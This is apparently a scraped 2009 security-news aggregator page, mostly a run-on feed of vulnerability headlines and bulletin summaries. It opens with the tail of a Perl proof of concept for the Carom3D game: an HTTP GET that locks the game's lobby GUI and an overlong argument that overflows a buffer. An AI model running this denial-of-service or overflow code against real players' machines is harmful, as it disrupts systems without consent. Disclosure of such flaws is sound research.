when we append 218 bytes as an argument ~1000 bytes# overwrites SEH The denial of service is triggered when a user# creates a LAN Game cred needed, creates a room and awaits# other players to join the game While awaiting listening on port# 28012, with a simple HTTP GET/POST, an attacker can lockdown# the GUI of the user created the room, not alowing to start or# even exit the game's GUI, unless forced quit X## Tested On: Microsoft Windows XP Professional SP3 English## Vulnerability discovered by Gjoko 'LiquidWorm' Krstic## liquidworm gmail com## http://wwwzeroscienceorg/## 15062009## ----------------------------------DoS---------------------------------- #use LWP::Simple;my $url = 'http://19216813:28012';my $lockdown = get $url;die "Couldn't get $url" unless defined $lockdown;# You can Ctrl+C, the lockdown is ON# ---------------------------------/DoS---------------------------------- ############################################################################# ----------------------------------BoF---------------------------------- ## Added 217 bytes as argument = runs normally# Added 218 bytes as argument triggers the MS VC++ Runtime Library# 'Buffer Overrun' error msg box informing us that the program's# internal state is corruptedsystem'C:\Progra~1\Neoact\Carom3D\caromexe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';# ---------------------------------/BoF---------------------------------- #http://zeroscienceorg/codes/carom3dtxtIMAGEhttp://www.secuobs.com/revue/news/110125.shtmlhttp://www.secuobs.com/revue/news/110125.shtml 2009-06-16 03:39:32 - Ars Technica Security : companion photo for Apple finally issues patch for "critical" Java vulnerabilityApple has finally issued a patch for a critical Java vulnerability inMac OS X that made headlines last month The update comes as part ofJava for Mac OS X 105 Update 4, a 158MB download from both Apple'swebsite and Software Update and requires Mac OS X 1057According to Apple, the update "delivers improved reliability,security, and compatibility for Java SE 6, J2SE 50 and J2SE 142"This includes one vulnerability related to de-serializing certain Javaobjects, which could result in arbitrary code running outside of theJVM's sandbox with the same privileges as the current user It wasreported to Sun in August 2008, and in December 2008 Sun disclosed thevulnerability and issued a patch Despite recent security updates fromApple, however, researchers blasted Apple for not having patched thevulnerability in Mac OS X yetClick here to read the rest of this articleIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/110034.shtmlhttp://www.secuobs.com/revue/news/110034.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109999.shtmlhttp://www.secuobs.com/revue/news/109999.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109997.shtmlhttp://www.secuobs.com/revue/news/109997.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109996.shtmlhttp://www.secuobs.com/revue/news/109996.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109995.shtmlhttp://www.secuobs.com/revue/news/109995.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109994.shtmlhttp://www.secuobs.com/revue/news/109994.shtml 2009-06-15 23:59:17 - milw0rm.com : http://www.secuobs.com/revue/news/109993.shtmlhttp://www.secuobs.com/revue/news/109993.shtml 2009-06-15 21:37:28 - Rootsecure.net : Security Focus: Multiple Kaspersky Products PDF File Scan EvasionVulnerabilityhttp://www.secuobs.com/revue/news/109954.shtmlhttp://www.secuobs.com/revue/news/109954.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Moderate - This security update resolves aprivately reported vulnerability in Windows Search The vulnerabilitycould allow information disclosure if a user performs a search thatreturns a specially crafted file as the first result or if the userpreviews a specially crafted file from the search results By default,the Windows Search component is not installed on Microsoft Windows XPand Windows Server 2003 It is an optional component available fordownload Windows Search installed on supported editions of WindowsVista and Windows Server 2008 is not affected by this vulnerabilityhttp://www.secuobs.com/revue/news/109939.shtmlhttp://www.secuobs.com/revue/news/109939.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Critical - This security update resolves aprivately reported vulnerability in the Microsoft Works convertersThe vulnerability could allow remote code execution if a user opens aspecially crafted Works file An attacker who successfully exploitedthis vulnerability could gain the same user rights as the local userUsers whose accounts are configured to have fewer user rights on thesystem could be less impacted than users who operate withadministrative user rightshttp://www.secuobs.com/revue/news/109938.shtmlhttp://www.secuobs.com/revue/news/109938.shtml 2009-06-15 21:28:42 - Microsoft Security Bulletins : Bulletin Severity Rating:Important - This security update resolves apublicly disclosed vulnerability in the Windows remote procedure callRPC facility where the RPC Marshalling Engine does not update itsinternal state appropriately The vulnerability could allow anattacker to execute arbitrary code and take complete control of anaffected system Supported editions of Microsoft Windows are notdelivered with any RPC servers or clients that are subject toexploitation of this vulnerability In a default configuration, userscould not be attacked by exploitation of this vulnerability However,the vulnerability is present in the Microsoft Windows RPC runtime andcould affect third-party RPC applicationshttp://www.secuobs.com/revue/news/109936.shtmlhttp://www.secuobs.com/revue/news/109936.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109885.shtmlhttp://www.secuobs.com/revue/news/109885.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109884.shtmlhttp://www.secuobs.com/revue/news/109884.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109881.shtmlhttp://www.secuobs.com/revue/news/109881.shtml 2009-06-15 20:37:42 - milw0rm.com : http://www.secuobs.com/revue/news/109876.shtmlhttp://www.secuobs.com/revue/news/109876.shtml 2009-06-14 14:09:26 - Shellstorm.org : http://www.secuobs.com/revue/news/109472.shtmlhttp://www.secuobs.com/revue/news/109472.shtml 2009-06-13 22:37:45 - Security Bloggers Network : Here is a fun job open at Qualys: Director of VulnerabilityResearchDescriptionThe Director of Vulnerability Research will beresponsible for ensuring that our vulnerability and compliancesignatures and detections are kept up to date on the latest tehttp://www.secuobs.com/revue/news/109405.shtmlhttp://www.secuobs.com/revue/news/109405.shtml 2009-06-13 06:30:38 - Webinars : 1:00 pm CST Only open to current Clients and Partnershttp://www.secuobs.com/revue/news/109318.shtmlhttp://www.secuobs.com/revue/news/109318.shtml 2009-06-13 00:15:44 - milw0rm.com : http://www.secuobs.com/revue/news/109227.shtmlhttp://www.secuobs.com/revue/news/109227.shtml 2009-06-12 17:01:14 - milw0rm.com : http://www.secuobs.com/revue/news/109045.shtmlhttp://www.secuobs.com/revue/news/109045.shtml 2009-06-12 17:01:14 - milw0rm.com : http://www.secuobs.com/revue/news/109044.shtmlhttp://www.secuobs.com/revue/news/109044.shtml 2009-06-12 04:22:23 - Security Bloggers Network : the good newsJPGIn the past we wrote several times about SecureSphereintegration with Web vulnerability scanners In the past I wrote howSecureSphere can be used for Web vulnerability managementThere's an important update The current shipping version ofSecureSphere provides out-of-the box integration with additionalvulnerability scanners:* Cenzic ClickToSecure and Hailstorm* HP WebInspect* IBM AppScan* NTObjectives NTOspider* WhiteHat SentinelAfter a scanner has completed its task, scan results are received andSecureSphere automatically creates user-editable security policiesthat mitigate detected vulnerabilities The mitigated vulnerabilitiesare saved in a database and the user can generate various reportsabout themCheck the SecureSphere WAF Enterprise Edition user guide forconfiguration instructionshttp://www.secuobs.com/revue/news/108871.shtmlhttp://www.secuobs.com/revue/news/108871.shtml 2009-06-12 01:58:39 - SecDocs Feed : http://www.secuobs.com/revue/news/108812.shtmlhttp://www.secuobs.com/revue/news/108812.shtml 2009-06-12 01:58:39 - SecDocs Feed : http://www.secuobs.com/revue/news/108811.shtmlhttp://www.secuobs.com/revue/news/108811.shtml 2009-06-11 23:24:05 - milw0rm.com : http://www.secuobs.com/revue/news/108732.shtmlhttp://www.secuobs.com/revue/news/108732.shtml 2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/108730.shtmlhttp://www.secuobs.com/revue/news/108730.shtml 2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/108729.shtmlhttp://www.secuobs.com/revue/news/108729.shtml 2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/108728.shtmlhttp://www.secuobs.com/revue/news/108728.shtml 2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/108727.shtmlhttp://www.secuobs.com/revue/news/108727.shtml 2009-06-11 23:23:12 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/108726.shtmlhttp://www.secuobs.com/revue/news/108726.shtml 2009-06-11 11:32:58 - Rootsecure.net : H Security: Google closes vulnerabilities in Chrome 2 "A vulnerability inWebKit can be exploited by an attacker to crash a tab or executearbitrary code in Google Chrome"http://www.secuobs.com/revue/news/108428.shtmlhttp://www.secuobs.com/revue/news/108428.shtml 2009-06-10 19:52:43 - milw0rm.com : http://www.secuobs.com/revue/news/108106.shtmlhttp://www.secuobs.com/revue/news/108106.shtml 2009-06-10 19:47:53 - Infosecurity.US : News, overnight, of the apparent destruction, and subsequent data loss,of an estimated one hundred thousand websites hosted in the UnitedKingdom at VASERV Evidence point to a virtulization exploit - atleast from the perspective of the ISP The truth probably residessomewhere between appalling poor securityassessment/management/policies and vulnerabilities in their hosted,virtualized platforms,; http://www.secuobs.com/revue/news/108102.shtmlhttp://www.secuobs.com/revue/news/108102.shtml 2009-06-10 14:39:56 - Help Net Security News : Core Security Technologies issued an advisory disclosing a vulnerabilitythat could affect millions of individuals and businesses usingMicrosoft’s Internet Explorer web browsing software A vulnerhttp://www.secuobs.com/revue/news/107970.shtmlhttp://www.secuobs.com/revue/news/107970.shtml 2009-06-09 23:51:13 - milw0rm.com : http://www.secuobs.com/revue/news/107703.shtmlhttp://www.secuobs.com/revue/news/107703.shtml 2009-06-09 23:51:13 - milw0rm.com : http://www.secuobs.com/revue/news/107702.shtmlhttp://www.secuobs.com/revue/news/107702.shtml 2009-06-09 23:51:13 - milw0rm.com : http://www.secuobs.com/revue/news/107701.shtmlhttp://www.secuobs.com/revue/news/107701.shtml 2009-06-09 22:00:46 - Security for the Masses : Kaspersky seems to have roiled security researcher Thierry Zoller withhow it handles it's vulnerabilities Read more about the latest flaw,Kaspersky PDF evasion, at SecDevIMAGEhttp://www.secuobs.com/revue/news/107658.shtmlhttp://www.secuobs.com/revue/news/107658.shtml 2009-06-09 21:53:50 - milw0rm.com : http://www.secuobs.com/revue/news/107642.shtmlhttp://www.secuobs.com/revue/news/107642.shtml 2009-06-09 21:53:50 - milw0rm.com : http://www.secuobs.com/revue/news/107641.shtmlhttp://www.secuobs.com/revue/news/107641.shtml 2009-06-09 21:38:28 - SOURCE Conference Blog : Vaserve, a UK webhosting company says that 100,000 of its customer siteswere wiped out in what looks like a zero day attack on HyperVM, avirtualization application they used The HyperVM was a product oflxlabs I checked out the lxlabs product documentation and website andcould not find any reference to using a http://www.secuobs.com/revue/news/107619.shtmlhttp://www.secuobs.com/revue/news/107619.shtml 2009-06-09 19:22:52 - milw0rm.com : http://www.secuobs.com/revue/news/107572.shtmlhttp://www.secuobs.com/revue/news/107572.shtml 2009-06-09 19:12:11 - Security Bloggers Network : According to the Register, a hacker attacked a Webhosting company’svirtual server infrastructure on Sunday and erased up to 100,000sites Vaservcom was hit by a calculated attack on its virtualizationapplication which left roughly half of Vaserv’s customer withouthttp://www.secuobs.com/revue/news/107551.shtmlhttp://www.secuobs.com/revue/news/107551.shtml 2009-06-09 03:32:44 - Hack In The Box : Almost three quarters 73% of IT professionals admit that their softwareis still vulnerable to hackers – just 8% down on last year'srevelation That's chief among findings by application securityspecialist Fortify Software – which also finds 46% believing thathacking at the application level is the easiest way into any companytoday That is significant – Fortify makes the point that it's 33%up on last year and in line with research that demonstratessignificant growth in hacks targeted at applications What's more,Fortify finds one third of IT pros thinking that buying externalapplications poses a greater security threat than writing them inhouse That said, 35% don't consider checking externally procuredapplications for flaws or vulnerabilities – although 55% say they'renow worried because it wasn't made a priority for developers Afurther 21% were disturbed because it is at the bottom of everyone'smindhttp://www.secuobs.com/revue/news/107231.shtmlhttp://www.secuobs.com/revue/news/107231.shtml 2009-06-09 00:17:38 - milw0rm.com : http://www.secuobs.com/revue/news/107171.shtmlhttp://www.secuobs.com/revue/news/107171.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107136.shtmlhttp://www.secuobs.com/revue/news/107136.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107134.shtmlhttp://www.secuobs.com/revue/news/107134.shtml 2009-06-08 22:24:37 - milw0rm.com : http://www.secuobs.com/revue/news/107131.shtmlhttp://www.secuobs.com/revue/news/107131.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107042.shtmlhttp://www.secuobs.com/revue/news/107042.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107041.shtmlhttp://www.secuobs.com/revue/news/107041.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107040.shtmlhttp://www.secuobs.com/revue/news/107040.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107039.shtmlhttp://www.secuobs.com/revue/news/107039.shtml 2009-06-08 17:54:27 - milw0rm.com : http://www.secuobs.com/revue/news/106992.shtmlhttp://www.secuobs.com/revue/news/106992.shtml 2009-06-08 17:54:27 - milw0rm.com : http://www.secuobs.com/revue/news/106991.shtmlhttp://www.secuobs.com/revue/news/106991.shtml 2009-06-08 17:54:27 - milw0rm.com : http://www.secuobs.com/revue/news/106990.shtmlhttp://www.secuobs.com/revue/news/106990.shtml 2009-06-08 17:54:27 - milw0rm.com : http://www.secuobs.com/revue/news/106989.shtmlhttp://www.secuobs.com/revue/news/106989.shtml 2009-06-08 17:47:34 - SANS Internet Storm Center, InfoCON green : We've had several readers Kirk being the first alert us to avulnerability in Klaxobeing exp morehttp://www.secuobs.com/revue/news/106986.shtmlhttp://www.secuobs.com/revue/news/106986.shtml 2009-06-07 23:36:51 - Security Database Tools Watch : SAINT is the Security Administrator's Integrated Network Tool It is usedto non-intrusively detect security vulnerabilities on any remotetarget, including servers, workstations, networking devices, and othertypes of nodes It will also gather information such as operatingsystem types and open ports The SAINT graphical user interfaceprovides access to SAINT's data management, scan configuration, scanscheduling, and data analysis capabilities through a web browserDifferent aspects of - Security Tools / Saint, VulnerabilityScanner, Automated ExploiterIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/106738.shtmlhttp://www.secuobs.com/revue/news/106738.shtml 2009-06-07 05:29:25 - SecGuru : In today’s market, secure software is a must for consumers Manydevelopers, however, are not familiar with the techniques needed toproduce secure code or detect existing vulnerabilities The SoftwareVulnerability Guide focuses on the origin of most softwarevulnerabilities, including the bugs in the underlying software used todevelop IT infrastructures and the Internet Most of these securitybugs and the viruses, worms, and exploits that derive from themstarted out as programmer mistakes With this easy-to-use guide,professional programmers and testers will learn how to recognize andprevent these vulnerabilities before their software reaches themarket For each of the 30 common software vulnerabilities featuredthe authors provide a summary, description of how the vulnerabilityoccurs, and famous examples of how it has been used Tips on how tofind and fix the vulnerability in software are also provided alongwith source code snippets, commentary, tools, and techniques ineasy-to-read sidebars This guide is a must-have for today’s softwaredevelopers KEY FEATURES * Includes coding examples in a variety oflanguages, including C, C++, Java, VB, NET, scripting languages, andmore * Provides tips for uncovering vulnerabilities in a diverse arrayof systems, including what it may look like in code, and how theoffending code can be fixed * Covers vulnerabilities such aspermitting default or weak passwords, cookie poisoning, exchangingsensitive data in plain text, leaving things in memory, and formatstring attacks * Includes a CD-ROM with all of the source code, aswell as many freeware/shareware tools discussed in the bookIMAGEIMAGEIMAGE IMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/106629.shtmlhttp://www.secuobs.com/revue/news/106629.shtml 2009-06-07 00:41:03 - Finshake : IMAGEI just wanted to throw up a quick blog post congratulating LureneGrenier of the Sourcefire’s Vulnerability Research Team Last week anupdate for Apple’s Quicktime and iTunes came out, and in it, lo andbehold was an update for CVE-2009-0956, a vulnerability in Quicktime’shandling of movie files So, I just wanted to congratulate her on thenice 0-day find Good jobLurene can also be found on Twitterhttp://www.secuobs.com/revue/news/106597.shtmlhttp://www.secuobs.com/revue/news/106597.shtml 2009-06-06 04:13:17 - Mac OS X Forensics : a new page discussing vulnerability scanning with the tool Nessus fromTenable Network Securityhttp://www.secuobs.com/revue/news/106477.shtmlhttp://www.secuobs.com/revue/news/106477.shtml 2009-06-05 22:46:34 - milw0rm.com : http://www.secuobs.com/revue/news/106394.shtmlhttp://www.secuobs.com/revue/news/106394.shtml 2009-06-05 22:46:34 - milw0rm.com : http://www.secuobs.com/revue/news/106393.shtmlhttp://www.secuobs.com/revue/news/106393.shtml 2009-06-05 22:46:34 - milw0rm.com : http://www.secuobs.com/revue/news/106392.shtmlhttp://www.secuobs.com/revue/news/106392.shtml 2009-06-05 15:39:25 - Security Bloggers Network : A vulnerability analysis tool used by the National Security Agency NSAand US Department of Homeland Security is now commercially availablefor enterprises that want to either make sense of their Read therest of the story herehttp://www.secuobs.com/revue/news/106216.shtmlhttp://www.secuobs.com/revue/news/106216.shtml 2009-06-05 13:41:22 - Reverse Engineering : submitted by rolfrlink 0 commentshttp://www.secuobs.com/revue/news/106187.shtmlhttp://www.secuobs.com/revue/news/106187.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105882.shtmlhttp://www.secuobs.com/revue/news/105882.shtml 2009-06-04 19:36:34 - milw0rm.com : http://www.secuobs.com/revue/news/105881.shtmlhttp://www.secuobs.com/revue/news/105881.shtml 2009-06-04 04:05:10 - Hack In The Box : Research in Motion RIM has issued a new security patch for BlackBerryEnterprise Server to fix vulnerabilities in its PDF distiller programThe patch was issued on a BlackBerry forum last week and was billed asa fix for any customers that use BlackBerry Enterprise Server BESversions 41 through 50 RIM said that there were “multiplesecurity vulnerabilities” that existed in some versions of theenterprise servers’ PDF distiller that were released as part of theBlackBerry Attachment Service The vulnerabilities could allow hackersto send users e-mails containing a “specifically crafted PDF file”that could cause memory corruption and “possibly lead to arbitrarycode execution” of the computer hosting the attachment servicehttp://www.secuobs.com/revue/news/105651.shtmlhttp://www.secuobs.com/revue/news/105651.shtml 2009-06-04 00:37:19 - milw0rm.com : http://www.secuobs.com/revue/news/105600.shtmlhttp://www.secuobs.com/revue/news/105600.shtml 2009-06-04 00:37:19 - milw0rm.com : http://www.secuobs.com/revue/news/105599.shtmlhttp://www.secuobs.com/revue/news/105599.shtml 2009-06-04 00:37:19 - milw0rm.com : http://www.secuobs.com/revue/news/105598.shtmlhttp://www.secuobs.com/revue/news/105598.shtml 2009-06-04 00:37:19 - milw0rm.com : http://www.secuobs.com/revue/news/105597.shtmlhttp://www.secuobs.com/revue/news/105597.shtml 2009-06-03 23:13:02 - Computer Security News : BlackBerry maker Research in Motion Ltd has issued a security patchfor the popular device, whose users include President Barack Obama,warning that it is vulnerable to attacks by hackershttp://www.secuobs.com/revue/news/105578.shtmlhttp://www.secuobs.com/revue/news/105578.shtml 2009-06-03 18:01:37 - milw0rm.com : http://www.secuobs.com/revue/news/105459.shtmlhttp://www.secuobs.com/revue/news/105459.shtml 2009-06-03 18:01:37 - milw0rm.com : http://www.secuobs.com/revue/news/105458.shtmlhttp://www.secuobs.com/revue/news/105458.shtml 2009-06-03 17:30:29 - ReverseConnection : Microsoft Windows Desktop Wall Paper System Parameter Local Denial OfService Vulnerability Source: click herehttp://www.secuobs.com/revue/news/105421.shtmlhttp://www.secuobs.com/revue/news/105421.shtml 2009-06-03 12:42:39 - ReverseConnection : OpenSC ‘pkcs11-tool’ Inseure Key Generation Vulnerability Source: clickherehttp://www.secuobs.com/revue/news/105326.shtmlhttp://www.secuobs.com/revue/news/105326.shtml 2009-06-03 05:15:29 - ReverseConnection : PHP-Nuke Downloads Module ‘query’ Parameter Cross Site ScriptingVulnerability Source: click herehttp://www.secuobs.com/revue/news/105212.shtmlhttp://www.secuobs.com/revue/news/105212.shtml 2009-06-03 05:15:29 - ReverseConnection : Podcast Generator ‘core/admin/deletephp’ Arbitrary File DeletionVulnerability Source: click herehttp://www.secuobs.com/revue/news/105208.shtmlhttp://www.secuobs.com/revue/news/105208.shtml 2009-06-03 05:15:29 - ReverseConnection : Apache Tomcat mod_jk Content Length Information Disclosure VulnerabilitySource: click herehttp://www.secuobs.com/revue/news/105206.shtmlhttp://www.secuobs.com/revue/news/105206.shtml 2009-06-03 05:15:29 - ReverseConnection : TPTI-09-04: Apple Terminal xterm Resize Escape Sequence MemoryCorruption Vulnerability Source: click herehttp://www.secuobs.com/revue/news/105205.shtmlhttp://www.secuobs.com/revue/news/105205.shtml 2009-06-03 05:15:29 - ReverseConnection : CORE-2009-0420 - Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointerVulnerability Source: click here Powered by Reverse-Connectioncomhttp://www.secuobs.com/revue/news/105204.shtmlhttp://www.secuobs.com/revue/news/105204.shtml 2009-06-03 00:12:00 - milw0rm.com : http://www.secuobs.com/revue/news/105128.shtmlhttp://www.secuobs.com/revue/news/105128.shtml 2009-06-02 19:44:46 - milw0rm.com : http://www.secuobs.com/revue/news/105039.shtmlhttp://www.secuobs.com/revue/news/105039.shtml 2009-06-02 19:44:46 - milw0rm.com : http://www.secuobs.com/revue/news/105037.shtmlhttp://www.secuobs.com/revue/news/105037.shtml 2009-06-02 19:29:18 - ReverseConnection : IBM WebSphere MQ Remote Buffer Overflow Vulnerability Source: click herehttp://www.secuobs.com/revue/news/105013.shtmlhttp://www.secuobs.com/revue/news/105013.shtml 2009-06-02 17:24:45 - Infosecurity.US : The United States Computer Emergency Readiness Team US-CERT hasreleased their ubiquitous weekly summary document, entitledappropriately enough US-CERT Cyber Security Bulletin SB09-152 —Vulnerability Summary for the Week of May 25, 2009 Detailing datasecurity issues that reared up during that week, we deem the report aweekly MustRead compilation You can view the http://www.secuobs.com/revue/news/104986.shtmlhttp://www.secuobs.com/revue/news/104986.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104578.shtmlhttp://www.secuobs.com/revue/news/104578.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104576.shtmlhttp://www.secuobs.com/revue/news/104576.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104575.shtmlhttp://www.secuobs.com/revue/news/104575.shtml 2009-06-01 23:56:10 - milw0rm.com : http://www.secuobs.com/revue/news/104574.shtmlhttp://www.secuobs.com/revue/news/104574.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104488.shtmlhttp://www.secuobs.com/revue/news/104488.shtml 2009-06-01 19:26:43 - milw0rm.com : http://www.secuobs.com/revue/news/104487.shtmlhttp://www.secuobs.com/revue/news/104487.shtml 2009-06-01 17:46:46 - About.com Internet Network Security : A vulnerability in Microsoft DirectShow is reportedly being exploited inthe wild Microsoft has issued a security advisory for the flaw971778 The affected code was removed in more recenthttp://www.secuobs.com/revue/news/104445.shtmlhttp://www.secuobs.com/revue/news/104445.shtml 2009-06-01 16:46:22 - ReverseConnection : OpenSSL ‘zlib’ Compression Memory Leak Remote Denial of ServiceVulnerability Source: click herehttp://www.secuobs.com/revue/news/104413.shtmlhttp://www.secuobs.com/revue/news/104413.shtml 2009-05-31 17:21:45 - Suspekt... : Two days ago I presented my session about bytecode encrypted PHPapplications and how to find vulnerabilities in them at 25C3 I didn’tupload the slides until now, because I got ill during the night aftermy talk and therefore spent most of yesterday in my hotelroom Buthere are the slides Session: Vulnerability Discovery in http://www.secuobs.com/revue/news/103910.shtmlhttp://www.secuobs.com/revue/news/103910.shtml 2009-05-31 17:21:45 - Suspekt... : A few days ago phpbbcom was hacked through a super-globals-overwritevulnerability in PHPList that was used by an attacker for a local fileinclusion exploit Details about the whole attack, written down bysomeone who claims to be the attacker, can be read here From theexplanation it seems that the PHP installation on phpbbcom http://www.secuobs.com/revue/news/103908.shtmlhttp://www.secuobs.com/revue/news/103908.shtml 2009-05-31 16:44:35 - Accuvant Insight : Overview: The blog post here makes statements about a vulnerability inthe Linux kernel handling of SCTP data The primary point of the postis to show how a vulnerability that was once thought to be of arelative low risk was incorrectly assessed and it can provide a 3rdparty remote access to a server http://www.secuobs.com/revue/news/103790.shtmlhttp://www.secuobs.com/revue/news/103790.shtml 2009-05-30 18:46:18 - SecurityTube.Net : Vulnerability Management in an Application Security World SnowFROCVideo TutorialIMAGEhttp://www.secuobs.com/revue/news/103585.shtmlhttp://www.secuobs.com/revue/news/103585.shtml 2009-05-30 13:45:00 - milw0rm.com : http://www.secuobs.com/revue/news/103515.shtmlhttp://www.secuobs.com/revue/news/103515.shtml 2009-05-30 13:45:00 - milw0rm.com : http://www.secuobs.com/revue/news/103514.shtmlhttp://www.secuobs.com/revue/news/103514.shtml 2009-05-30 13:45:00 - milw0rm.com : http://www.secuobs.com/revue/news/103513.shtmlhttp://www.secuobs.com/revue/news/103513.shtml 2009-05-30 13:45:00 - milw0rm.com : http://www.secuobs.com/revue/news/103512.shtmlhttp://www.secuobs.com/revue/news/103512.shtml 2009-05-30 13:29:52 - ReverseConnection : Adobe Acrobat Stack Exhaustion Denial of Service Vulnerability Source:click herehttp://www.secuobs.com/revue/news/103497.shtmlhttp://www.secuobs.com/revue/news/103497.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103391.shtmlhttp://www.secuobs.com/revue/news/103391.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103389.shtmlhttp://www.secuobs.com/revue/news/103389.shtml 2009-05-30 05:21:03 - milw0rm.com : http://www.secuobs.com/revue/news/103387.shtmlhttp://www.secuobs.com/revue/news/103387.shtml 2009-05-30 05:12:29 - Security Bloggers Network : A vulnerability involving a Direct X component of Microsoft’s WindowsQuickTime Parser is facilitating current drive-by hacking incidentsIt is reported that the vulnerability is automatically being activatedwithout user intervention when a user simply browses a website thatcontains a maliciously crafted QuickTime file and can provide thehacker with complete control over the compromised PC Windows http://www.secuobs.com/revue/news/103377.shtmlhttp://www.secuobs.com/revue/news/103377.shtml 2009-05-30 05:04:14 - ReverseConnection : SonicWALL SSL-VPN ‘cgi-bin/welcome/VirtualOffice’ Remote Format StringVulnerability Source: click herehttp://www.secuobs.com/revue/news/103361.shtmlhttp://www.secuobs.com/revue/news/103361.shtml 2009-05-30 05:04:14 - ReverseConnection : Re: InterN0T Achievo 134 - XSS Vulnerability Source: click herehttp://www.secuobs.com/revue/news/103359.shtmlhttp://www.secuobs.com/revue/news/103359.shtml 2009-05-30 05:04:14 - ReverseConnection : Linksys WAG54G2 Web Management Console Remote Arbitrary Shell CommandInjection Vulnerability Source: click herehttp://www.secuobs.com/revue/news/103357.shtmlhttp://www.secuobs.com/revue/news/103357.shtml 2009-05-29 23:18:00 - Infosecurity.US : News, of the United States National Security Agency’s CAULDRON securitytool move into private practice… The vulnerability research productsystem has now moved into the private sector Originally developed byresearchers at George Mason University under contract to the Agencyand United States Air Force Essentially, the product is avulnerability aggregator, correlating output from http://www.secuobs.com/revue/news/103252.shtmlhttp://www.secuobs.com/revue/news/103252.shtml